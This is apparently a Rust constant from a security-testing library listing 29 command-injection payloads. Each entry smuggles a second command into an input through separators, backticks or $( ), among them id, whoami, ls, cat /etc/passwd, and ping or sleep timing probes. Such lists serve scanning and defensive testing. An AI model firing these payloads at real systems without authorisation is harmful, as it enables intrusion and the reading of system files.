pub const COMMAND_INJECTION: &str = ";id\n|id\n`id`\n$(id)\n;whoami\n|whoami\n`whoami`\n$(whoami)\n;ls\n|ls\n`ls`\n$(ls)\n;cat /etc/passwd\n|cat /etc/passwd\n`cat /etc/passwd`\n$(cat /etc/passwd)\n||ping -c 10 127.0.0.1\n&&ping -c 10 127.0.0.1\n;ping -c 10 127.0.0.1\n|ping -c 10 127.0.0.1\n`ping -c 10 127.0.0.1`\n$(ping -c 10 127.0.0.1)\n;sleep 5\n|sleep 5\n`sleep 5`\n$(sleep 5)\n\\nid\\n\n\\n/bin/ls -al\\n\n\\n/usr/bin/id\\n";Expand description
Command injection payloads (29 patterns)